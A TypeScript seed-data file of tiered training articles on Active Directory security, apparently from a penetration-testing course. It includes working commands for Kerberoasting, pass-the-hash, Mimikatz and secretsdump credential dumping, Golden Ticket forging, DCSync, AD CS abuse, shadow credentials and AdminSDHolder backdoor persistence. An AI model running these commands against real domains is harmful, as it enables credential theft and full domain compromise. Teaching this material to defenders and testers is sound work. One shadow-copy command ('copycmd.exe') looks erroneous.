import type { SeedArticle } from "./types";

export const AD_ARTICLES: SeedArticle[] = [
  {
    competencyId: "ad-fundamentals",
    depthTier: 0,
    title: "Active Directory Overview",
    recommendedLevel: 0,
    sections: [
      { heading: "What is Active Directory", content: `Active Directory (AD) is Microsoft's directory service for Windows domain networks. It stores information about users, computers, groups, and policies in a centralized, hierarchical database. Nearly every enterprise Windows environment relies on AD for authentication and authorization.\n\nFor penetration testers, AD is one of the highest-value targets — compromising a Domain Controller means controlling every account and machine in the domain.`, sortOrder: 0 },
      { heading: "Why AD matters for security", content: `- Over 95% of Fortune 500 companies use Active Directory\n- A single misconfiguration can lead to full domain compromise\n- AD attacks chain together: enumerate → credential access → lateral movement → domain admin\n- Kerberos (AD's authentication protocol) has fundamental design weaknesses that attackers exploit\n- Tools like BloodHound can map attack paths across thousands of objects in minutes`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **Domain Controller (DC)**: Server running AD DS (Domain Services), handles authentication\n- **Domain**: A logical grouping of objects (users, computers) sharing a common namespace\n- **Forest**: Collection of one or more domain trees sharing a common schema\n- **Kerberos**: The primary authentication protocol in AD\n- **NTLM**: Legacy authentication protocol, still widely used\n- **Group Policy (GPO)**: Centralized configuration management\n- **LDAP**: Lightweight Directory Access Protocol — how clients query AD\n- **SPN**: Service Principal Name — identifies a service instance for Kerberos`, sortOrder: 2 },
      { heading: "Sources", content: `- Microsoft AD DS documentation: learn.microsoft.com/en-us/windows-server/identity/ad-ds\n- MITRE ATT&CK: Credential Access (TA0006), Lateral Movement (TA0008)\n- Sean Metcalf, adsecurity.org`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 1,
    title: "Active Directory Basics",
    recommendedLevel: 1,
    sections: [
      { heading: "AD structure and objects", content: `AD organizes objects in a hierarchy:\n\n\`\`\`\nForest: corp.local\n└── Domain: corp.local\n    ├── OU=Users\n    │   ├── CN=John Smith\n    │   └── CN=Jane Doe\n    ├── OU=Computers\n    │   ├── CN=WS01\n    │   └── CN=WS02\n    ├── OU=Servers\n    │   └── CN=DC01\n    └── OU=Groups\n        ├── CN=Domain Admins\n        └── CN=IT Staff\n\`\`\`\n\nKey object types:\n- **User**: Account with credentials, group memberships, attributes\n- **Computer**: Machine account (also has a password, rotated every 30 days)\n- **Group**: Security or distribution group (nesting creates complex permission chains)\n- **Organizational Unit (OU)**: Container for organizing objects and applying GPOs`, sortOrder: 0 },
      { heading: "Kerberos authentication flow", content: `\`\`\`mermaid\nsequenceDiagram\n    participant U as User\n    participant KDC as KDC (DC)\n    participant S as Service\n    U->>KDC: AS-REQ (username + timestamp encrypted with password hash)\n    KDC->>U: AS-REP (TGT encrypted with krbtgt hash)\n    U->>KDC: TGS-REQ (TGT + requested service SPN)\n    KDC->>U: TGS-REP (Service Ticket encrypted with service account hash)\n    U->>S: AP-REQ (Service Ticket)\n    S->>U: AP-REP (optional mutual auth)\n\`\`\`\n\nKey insight: the KDC trusts the TGT because only it knows the krbtgt hash. If an attacker obtains the krbtgt hash, they can forge TGTs for any user — this is a **Golden Ticket** attack.`, sortOrder: 1 },
      { heading: "Basic enumeration commands", content: `\`\`\`bash\n# From a domain-joined Windows machine\nnet user /domain\nnet group "Domain Admins" /domain\nnltest /dclist:corp.local\n\n# PowerShell AD module\nGet-ADUser -Filter * -Properties *\nGet-ADGroup -Filter * | Select Name\nGet-ADComputer -Filter * -Properties OperatingSystem\n\n# From Linux with credentials\ncrackmapexec smb dc01.corp.local -u user -p password --users\ncrackmapexec smb dc01.corp.local -u user -p password --groups\nldapsearch -x -H ldap://dc01.corp.local -D "user@corp.local" -w password -b "DC=corp,DC=local"\n\`\`\``, sortOrder: 2 },
      { heading: "NTLM vs Kerberos", content: `| Feature | NTLM | Kerberos |\n|---------|------|----------|\n| Protocol | Challenge-response | Ticket-based |\n| Uses DC | No (can be standalone) | Yes (requires KDC) |\n| Mutual auth | No | Yes |\n| Default in AD | Fallback | Primary |\n| Relay attacks | Vulnerable | Not directly |\n| Pass-the-hash | Yes | Via overpass-the-hash |\n\nNTLM is still used as a fallback when Kerberos isn't available (IP-based access, cross-forest, legacy systems). NTLM relay attacks remain one of the most effective AD attack vectors.`, sortOrder: 3 },
      { heading: "Sources", content: `- Microsoft Kerberos documentation\n- RFC 4120 (The Kerberos Network Authentication Service V5)\n- Sean Metcalf, "Attack and Defense of Active Directory" (adsecurity.org)`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 2,
    title: "Active Directory Attacks in Depth",
    recommendedLevel: 2,
    sections: [
      { heading: "BloodHound for attack path mapping", content: `> **AD object permissions (ACLs).** Every AD object has a Discretionary Access Control List (DACL) — a list of permission entries. Key permission types you will encounter: **GenericAll** (full control), **GenericWrite** (modify attributes), **WriteDACL** (change the object's permissions), **WriteOwner** (take ownership), **ForceChangePassword**, **AddMembers** (add yourself to a group). These permissions are what BloodHound graphs: a "path to Domain Admin" is a chain of exploitable DACLs.

BloodHound maps AD relationships to find attack paths to Domain Admin:\n\n\`\`\`bash\n# Collect data with SharpHound (from domain-joined machine)\n.\\SharpHound.exe -c All --zipfilename data.zip\n\n# Or with bloodhound-python (from Linux)\nbloodhound-python -d corp.local -u user -p password -c All -ns DC_IP\n\n# Import into BloodHound GUI\n# Key queries:\n# - "Shortest Path to Domain Admins"\n# - "Find Principals with DCSync Rights"\n# - "Find Computers where Domain Users are Local Admin"\n\`\`\`\n\nBloodHound reveals non-obvious paths: User A is member of Group B, which has GenericAll on User C, who is a member of Domain Admins. Each step is exploitable.`, sortOrder: 0 },
      { heading: "Kerberoasting", content: `Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline:\n\n\`\`\`bash\n# Request service tickets (Impacket)\nGetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request\n\n# PowerShell\nRequest-SPNTicket -SPN "MSSQLSvc/db01.corp.local:1433"\n\n# With Rubeus\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt\n\`\`\`\n\nWhy it works: the service ticket is encrypted with the service account's NTLM hash. If the password is weak, it can be cracked offline — no failed login attempts, no account lockout.`, sortOrder: 1 },
      { heading: "AS-REP Roasting", content: `> **What is preauthentication?** In normal Kerberos (L1), the AS-REQ includes a timestamp encrypted with the user's password hash — this proves the requester knows the password *before* the KDC issues a TGT. If "Do not require Kerberos preauthentication" is set on an account, the KDC skips this check and returns an AS-REP containing data encrypted with the user's hash — anyone can request it and crack it offline.

Targets accounts with "Do not require Kerberos preauthentication" set:\n\n\`\`\`bash\n# Find vulnerable accounts\nGetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass\n\n# The AS-REP contains data encrypted with the user's hash\n# Crack with hashcat\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt\n\`\`\`\n\nLess common than Kerberoasting, but doesn't require any credentials to execute — just a list of usernames.`, sortOrder: 2 },
      { heading: "Pass-the-Hash and overpass-the-hash", content: `**Why a hash is enough.** NTLM authentication never transmits or checks the plaintext password — the **NT hash** *is* the secret. The server sends a challenge, the client encrypts it with the NT hash, and the DC verifies using its own stored copy of that same hash. So once you steal the hash (from LSASS, the local SAM, or NTDS.dit), you already hold everything needed to authenticate — there is nothing left to crack, you simply replay it. That is **Pass-the-Hash**.\n\n**Pass-the-Hash vs overpass-the-hash:**\n- **Pass-the-Hash (PtH)** authenticates over **NTLM**, feeding the hash straight into the challenge-response. Simple — but it only works where NTLM is accepted and it stands out to defenders monitoring NTLM logons.\n- **Overpass-the-hash** uses the NT hash as the RC4 key to request a genuine **Kerberos TGT** (\`asktgt /rc4:HASH\`). From then on you authenticate with Kerberos tickets like any normal user — stealthier, and it reaches Kerberos-only services that refuse NTLM.\n\n\`\`\`mermaid\nflowchart LR\n    H["Stolen NT hash"] --> PtH["Pass-the-Hash (NTLM challenge-response)"]\n    H --> OPtH["Overpass-the-hash (hash = RC4 key, request TGT)"]\n    PtH --> NA["Access to NTLM services"]\n    OPtH --> KA["Kerberos ticket → any service"]\n\`\`\`\n\n\`\`\`bash\n# Pass-the-Hash with Impacket (NTLM) — replay the hash directly\npsexec.py corp.local/administrator@target -hashes :NTLM_HASH\nwmiexec.py corp.local/administrator@target -hashes :NTLM_HASH\nevil-winrm -i target -u administrator -H NTLM_HASH\n\n# Overpass-the-hash — turn the NT hash into a Kerberos TGT\nRubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt\n\n# Impacket equivalent\ngetTGT.py corp.local/admin -hashes :NTLM_HASH\nexport KRB5CCNAME=admin.ccache\npsexec.py corp.local/admin@target -k -no-pass\n\`\`\`\n\nThis is why the NT hash must be guarded like a password, and why defenses target hash theft itself (Credential Guard, LSASS protection) — see also "NTLM vs Kerberos" in the L1 article. Source: MITRE ATT&CK T1550.002 (Pass the Hash), T1550.003 (Pass the Ticket); Benjamin Delpy (mimikatz).`, sortOrder: 3 },
      { heading: "Credential dumping", content: `> **Where Windows stores credentials.** Three locations matter: (1) **LSASS** (Local Security Authority Subsystem Service) — a process running on every Windows machine that caches password hashes, Kerberos tickets, and sometimes plaintext passwords in memory for SSO. (2) **SAM** (Security Account Manager) — a registry hive (\\\`HKLM\\\\SAM\\\`) storing local account password hashes; exists on every Windows machine. (3) **NTDS.dit** — the AD database file on Domain Controllers, containing every domain user's password hash. Each storage requires a different extraction technique.

\`\`\`bash\n# Mimikatz (on compromised Windows host)\nmimikatz# privilege::debug\nmimikatz# sekurlsa::logonpasswords  # dump plaintext & hashes from memory\nmimikatz# lsadump::sam             # dump local SAM database\nmimikatz# lsadump::dcsync /user:krbtgt  # DCSync to get krbtgt hash\n\n# From Linux with Impacket\nsecretsdump.py corp.local/admin:password@DC_IP\n# Dumps: SAM, LSA secrets, NTDS.dit (all domain hashes)\n\n# LSASS dump (for offline analysis)\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp\n# Then: mimikatz# sekurlsa::minidump lsass.dmp\n\`\`\``, sortOrder: 4 },
      { heading: "Sources", content: `- MITRE ATT&CK: Credential Dumping (T1003), Kerberoasting (T1558.003)\n- BloodHound documentation: bloodhound.readthedocs.io\n- Harmj0y's blog: blog.harmj0y.net\n- Impacket: github.com/fortra/impacket\n- Microsoft LAPS documentation`, sortOrder: 5 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 3,
    title: "Advanced Active Directory Attacks",
    recommendedLevel: 3,
    sections: [
      { heading: "Golden and Silver Tickets", content: `**Golden Ticket**: Forged TGT using the krbtgt hash — grants access as any user to any service in the domain.\n\n\`\`\`bash\n# Forge Golden Ticket with Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py corp.local/Administrator@dc01 -k -no-pass\n\n# With Mimikatz\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt\n\`\`\`\n\n**Silver Ticket**: Forged service ticket using a service account's hash — grants access to that specific service only. Harder to detect (never touches the DC).\n\n\`\`\`bash\nticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain corp.local -spn MSSQLSvc/db01.corp.local Administrator\n\`\`\``, sortOrder: 0 },
      { heading: "DCSync attack", content: `DCSync abuses the Directory Replication Service protocol to request password hashes directly from the DC:\n\n\`\`\`bash\n# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All\n# (Domain Admins have this by default)\n\n# Dump all hashes\nsecretsdump.py corp.local/admin:password@dc01.corp.local\n\n# Dump specific user\nsecretsdump.py corp.local/admin:password@dc01.corp.local -just-dc-user krbtgt\n\n# With Mimikatz\nlsadump::dcsync /domain:corp.local /user:krbtgt\n\`\`\`\n\nDetection: monitor for DRS replication requests from non-DC sources (Event ID 4662 with specific GUIDs).`, sortOrder: 1 },
      { heading: "AD CS attacks (Certifried / ESC1-ESC8)", content: `> **What is AD CS?** Active Directory Certificate Services is a Windows Server role that runs a Certificate Authority (CA) inside the domain. It issues X.509 certificates to users and machines for authentication, encryption, and code signing. Certificates are generated from **templates** — predefined configurations that control who can request a cert, what it can be used for, and whether the requester can specify a Subject Alternative Name (SAN). The CA trusts its own templates, so a misconfigured template that lets an attacker choose the SAN means they can get a certificate authenticating as any user — including Domain Admin.

Active Directory Certificate Services (AD CS) has become a major attack surface since the "Certified Pre-Owned" research:\n\n\`\`\`bash\n# Enumerate vulnerable templates with Certipy\ncertipy find -u user@corp.local -p password -dc-ip DC_IP\n\n# ESC1: Template allows SAN (Subject Alternative Name)\n# Request cert as Domain Admin\ncertipy req -u user@corp.local -p password -ca CORP-CA \\n  -template VulnTemplate -upn administrator@corp.local\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip DC_IP\n# Returns the NTLM hash of administrator\n\`\`\`\n\nKey escalation paths:\n- **ESC1**: Template allows requester-supplied SAN — request cert as any user\n- **ESC4**: Template ACL allows attacker to modify it into an ESC1 template\n- **ESC8**: NTLM relay to the CA HTTP enrollment endpoint\n- **ESC9** (No Security Extension): Certificates lack \`szOID_NTDS_CA_SECURITY_EXT\` — allows name impersonation when \`StrongCertificateBindingEnforcement\` is not set to 2\n- **ESC11**: NTLM relay to the RPC enrollment endpoint (\`IF_ENFORCEENCRYPTICERTREQUEST\` not set)\n- **ESC13**: Issuance policy OID mapped to a group — any cert with that policy grants group membership\n\nSource: SpecterOps "Certified Pre-Owned" (2021) and follow-up research (2023-2024) by Oliver Lyak (Certipy author).`, sortOrder: 2 },
      { heading: "Delegation attacks", content: `> **What is Kerberos delegation?** Some services need to access other services on behalf of a user (e.g., a web app querying a database as the logged-in user). Kerberos delegation allows this by forwarding the user's authentication. There are three types, each with different security implications: **unconstrained** (service gets the user's full TGT — can impersonate them to anything), **constrained** (service can only forward to specific SPNs, using S4U2Self and S4U2Proxy protocol extensions), and **resource-based constrained** (RBCD — the *target* resource decides who can delegate to it, configured via the \`msDS-AllowedToActOnBehalfOfOtherIdentity\` attribute).

Kerberos delegation allows services to act on behalf of users:\n\n**Unconstrained delegation**: The service has access to the user's TGT — can impersonate them anywhere.\n\`\`\`bash\n# Find unconstrained delegation machines\nGet-ADComputer -Filter {TrustedForDelegation -eq $true}\n\n# Coerce auth from DC to this machine (e.g., PrinterBug)\nSpoolSample.exe DC01 ATTACKER_MACHINE\n# Capture the DC's TGT with Rubeus\nRubeus.exe monitor /interval:5 /nowrap\n\`\`\`\n\n**Constrained delegation**: Limited to specific services, but can be abused with S4U2Self + S4U2Proxy.\n\n**Resource-Based Constrained Delegation (RBCD)**: If you can modify msDS-AllowedToActOnBehalfOfOtherIdentity on a target, you can impersonate any user to that target.`, sortOrder: 3 },
      { heading: "Trust attacks and forest compromise", content: `> **What is SID History?** When users are migrated between domains, Windows preserves their old Security Identifier (SID) in the \`sIDHistory\` attribute so they can still access resources in the old domain. Attackers abuse this: by injecting the Enterprise Admins SID (from the forest root domain) into a Golden Ticket's SID History, a child-domain admin can escalate to forest-wide control.

AD trusts create authentication paths between domains:\n\n\`\`\`bash\n# Enumerate trusts\nnltest /domain_trusts /all_trusts\nGet-ADTrust -Filter *\n\n# Cross-domain attacks with SID History\n# If you have Domain Admin in child domain:\n# Forge a Golden Ticket with the Enterprise Admins SID\nticketer.py -nthash KRBTGT_HASH -domain-sid CHILD_SID \\n  -domain child.corp.local -extra-sid ENTERPRISE_ADMINS_SID Administrator\n\`\`\`\n\nA compromise of any domain in a forest can lead to forest-wide compromise through trust exploitation.`, sortOrder: 4 },
      { heading: "Sources", content: `- Will Schroeder & Lee Christensen, "Certified Pre-Owned" (SpecterOps)\n- Harmj0y, "A Guide to Attacking Domain Trusts"\n- MITRE ATT&CK: Golden Ticket (T1558.001), DCSync (T1003.006)\n- Certipy: github.com/ly4k/Certipy\n- Rubeus: github.com/GhostPack/Rubeus`, sortOrder: 5 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 4,
    title: "AD Red Team Operations",
    recommendedLevel: 4,
    sections: [
      { heading: "SCCM and MECM exploitation", content: `> **What is SCCM?** System Center Configuration Manager (SCCM, now rebranded Microsoft Endpoint Configuration Manager / MECM) is Microsoft's enterprise tool for deploying software, patches, and OS images across domain-joined machines. It uses a hierarchy of **site servers**, **management points** (MP — client-facing API), and **distribution points** (DP — content delivery). Every managed client runs an SCCM agent that checks in with the MP. The **Network Access Account** (NAA) is a domain account SCCM uses to download content from DPs — its credentials are deployed to every client and often overprivileged.

System Center Configuration Manager (SCCM/MECM) manages software deployment across the domain — and is frequently misconfigured:\n\n\`\`\`bash\n# Enumerate SCCM with SharpSCCM\nSharpSCCM.exe local\nSharpSCCM.exe get site-info\n\n# Recover Network Access Account (NAA) credentials\n# The NAA creds are deployed to all clients and often overprivileged\nSharpSCCM.exe get naa\n\n# Deploy an application to a specific device\n# (requires specific SCCM permissions)\nSharpSCCM.exe exec -d TARGET_DEVICE -p "C:\\\\Windows\\\\System32\\\\cmd.exe" -r "/c whoami > C:\\\\output.txt"\n\`\`\`\n\nSCCM has its own hierarchy of site servers, management points, and distribution points — each with potential misconfigurations.`, sortOrder: 0 },
      { heading: "LAPS and gMSA credential theft", content: `**LAPS** (Local Administrator Password Solution) stores randomized local admin passwords in AD:\n\n\`\`\`bash\n# Read LAPS password (requires ms-Mcs-AdmPwd read access)\nGet-ADComputer WS01 -Properties ms-Mcs-AdmPwd\ncrackmapexec ldap dc01.corp.local -u user -p password -M laps\n\n# LAPSv2 uses Windows LAPS with encrypted passwords\n# Decryption requires specific permissions\n\`\`\`\n\n**gMSA** (Group Managed Service Accounts) have passwords managed by AD:\n\n\`\`\`bash\n# Read gMSA password (if authorized)\nGet-ADServiceAccount -Identity gmsa_svc -Properties msDS-ManagedPassword\n\n# With Python (gMSADumper)\npython3 gMSADumper.py -u user -p password -d corp.local\n\`\`\``, sortOrder: 1 },
      { heading: "Shadow credentials and Key Trust", content: `Shadow Credentials abuse the msDS-KeyCredentialLink attribute (used for Windows Hello for Business):\n\n\`\`\`bash\n# Add shadow credentials to a target account\n# (requires write access to msDS-KeyCredentialLink)\npython3 pywhisker.py -d corp.local -u attacker -p password \\n  --target victim --action add\n\n# Authenticate using the added key\ncertipy auth -pfx victim.pfx -dc-ip DC_IP\n\n# With Whisker (C#)\nWhisker.exe add /target:victim\n\`\`\`\n\nThis is stealthier than password changes — the target user's password remains unchanged, and the added key can be removed after use.`, sortOrder: 2 },
      { heading: "AD persistence mechanisms", content: `Maintaining access after compromise:\n\n- **Golden Ticket**: Persists until krbtgt password is rotated twice\n- **DCSync permissions**: Grant a controlled account replication rights\n- **AdminSDHolder**: Modify the AdminSDHolder ACL — SDProp propagates permissions to all protected groups every 60 minutes\n- **Skeleton Key**: Patch LSASS on the DC to add a master password\n- **Custom SSP**: Load a Security Support Provider DLL into LSASS for credential logging\n- **GPO abuse**: Create/modify a GPO that grants persistence (scheduled tasks, startup scripts)\n\n\`\`\`bash\n# AdminSDHolder persistence\nAdd-DomainObjectAcl -TargetIdentity AdminSDHolder \\n  -PrincipalIdentity backdoor_user -Rights All\n# After 60 minutes, backdoor_user has full control over\n# Domain Admins, Enterprise Admins, etc.\n\`\`\``, sortOrder: 3 },
      { heading: "Azure AD / Entra ID attacks in hybrid environments", content: `Most enterprises use hybrid AD — on-prem AD synced to Azure AD (now Entra ID) via Azure AD Connect. This creates new attack surfaces:\n\n\`\`\`mermaid\nflowchart LR\n    subgraph On-Prem\n        AD[Active Directory]\n        AADC[Azure AD Connect]\n    end\n    subgraph Cloud\n        EID[Entra ID]\n        M365[Microsoft 365]\n    end\n    AD <-->|PHS / PTA / Federation| AADC\n    AADC <-->|Sync| EID\n    EID --> M365\n\`\`\`\n\n**Password Hash Sync (PHS) abuse**: Azure AD Connect stores credentials with \`DCSync\` rights. Compromising the Connect server = DCSync without touching a DC.\n\n**PRT (Primary Refresh Token) theft**: The PRT is a long-lived token that provides SSO to all Azure/M365 services.\n\`\`\`bash\n# Extract PRT with ROADtools\nroadrecon auth --prt-cookie <prt_cookie>\nroadrecon gather\n\n# With AADInternals\nGet-AADIntUserPRTToken\n\`\`\`\n\n**Consent Grant phishing**: Trick a user into granting an attacker-controlled app permissions (Mail.Read, Files.ReadWrite.All) via OAuth consent flow.\n\n**Dangerous Azure AD roles**: Global Admin, Application Admin, Cloud Application Admin, Privileged Role Admin can all escalate to full tenant control.\n\nSources: Dirk-jan Mollema (dirkjanm.io), ROADtools (github.com/dirkjanm/ROADtools), Andy Robbins "Azure AD attack paths" (SpecterOps)`, sortOrder: 4 },
      { heading: "Sources", content: `- SpecterOps blog: specterops.io/blog\n- SharpSCCM: github.com/Mayyhem/SharpSCCM\n- Elad Shamir, "Shadow Credentials" research\n- Dirk-jan Mollema, Azure AD research: dirkjanm.io\n- ROADtools: github.com/dirkjanm/ROADtools\n- Microsoft LAPS documentation\n- MITRE ATT&CK: Account Manipulation (T1098)`, sortOrder: 5 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 5,
    title: "Active Directory Internals",
    recommendedLevel: 5,
    sections: [
      { heading: "NTDS.dit internals", content: `NTDS.dit is the AD database (Extensible Storage Engine / JET Blue format). It stores all domain objects and their attributes, including password hashes.\n\n\`\`\`bash\n# Volume Shadow Copy extraction\nvssadmin create shadow /for=C:\ncopycmd.exe \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\NTDS\\\\ntds.dit C:\\\\temp\\\\ntds.dit\nreg save HKLM\\\\SYSTEM C:\\\\temp\\\\system.hive\n\n# Extract hashes offline\nsecretsdump.py -ntds ntds.dit -system system.hive LOCAL\n\n# NTDS.dit structure:\n# datatable: main table with all objects\n# link_table: group memberships, linked attributes\n# sd_table: security descriptors\n# Each user object contains: unicodePwd (NT hash), supplementalCredentials\n\`\`\`\n\nThe PEK (Password Encryption Key) encrypts the stored hashes — it's derived from the SYSTEM hive's BOOTKEY, which is why you need both files.`, sortOrder: 0 },
      { heading: "Kerberos protocol internals", content: `Deep dive into Kerberos ticket structure:\n\n\`\`\`\nTGT structure:\n  Encrypted with krbtgt NTLM hash:\n    - Client principal name\n    - Authorization data (PAC)\n    - Session key\n    - Ticket lifetime\n    - Flags (forwardable, renewable, etc.)\n\nPAC (Privilege Attribute Certificate):\n  - User SID\n  - Group SIDs\n  - Logon info (username, domain, logon time)\n  - Server checksum (service key)\n  - KDC checksum (krbtgt key)\n  - Ticket checksum (added in Windows Server 2022 to prevent Bronze Bit)\n\`\`\`\n\nPAC validation: the service verifies the server checksum; historically, many services skipped KDC checksum verification, enabling Silver Ticket attacks. Windows Server 2022 added the Ticket checksum to harden against this.`, sortOrder: 1 },
      { heading: "DPAPI architecture", content: `DPAPI (Data Protection API) protects user secrets (saved passwords, certificates, Wi-Fi keys):\n\n\`\`\`\nMaster Key → derived from user password + SID\n  └── Encrypts individual secrets (credential blobs)\n  └── Backup: encrypted with domain's DPAPI backup key\n      └── Stored on DC, recoverable with Domain Admin\n\`\`\`\n\n\`\`\`bash\n# Decrypt DPAPI master keys (Mimikatz)\ndpapi::masterkey /in:master_key_file /sid:USER_SID /password:user_password\n\n# Decrypt credential files\ndpapi::cred /in:credential_file /masterkey:DECRYPTED_KEY\n\n# Domain backup key (requires DA)\nlsadump::backupkeys /system:dc01.corp.local /export\n# This key can decrypt ANY user's master keys — persistent domain-wide secret access\n\`\`\``, sortOrder: 2 },
      { heading: "AD security boundaries and trust model", content: `Microsoft's security boundary is the **forest**, not the domain. Key implications:\n\n- Domain Admins in a child domain can compromise the forest root via SID History\n- The krbtgt account is per-domain, but forest trusts use inter-realm TGTs\n- Schema and Configuration partitions are forest-wide — Schema Admin can modify the AD schema for all domains\n\nTrue isolation requires separate forests. Selective authentication on trust objects provides partial mitigation but is complex to maintain.\n\nAzure AD (Entra ID) integration adds new attack surfaces: Azure AD Connect sync, PHS (Password Hash Sync), PTA (Pass-through Authentication), and seamless SSO all create bridges between on-prem AD and the cloud.`, sortOrder: 3 },
      { heading: "Sources", content: `- Microsoft AD Technical Reference (learn.microsoft.com)\n- RFC 4120 (Kerberos V5)\n- Benjamin Delpy (Mimikatz author) blog and presentations\n- Charlie Clark & Andrew Schwartz, "DPAPI: Don't Put Adversaries in Peril... Immediately"\n- Microsoft "Securing Privileged Access" documentation`, sortOrder: 4 },
    ],
  },
];
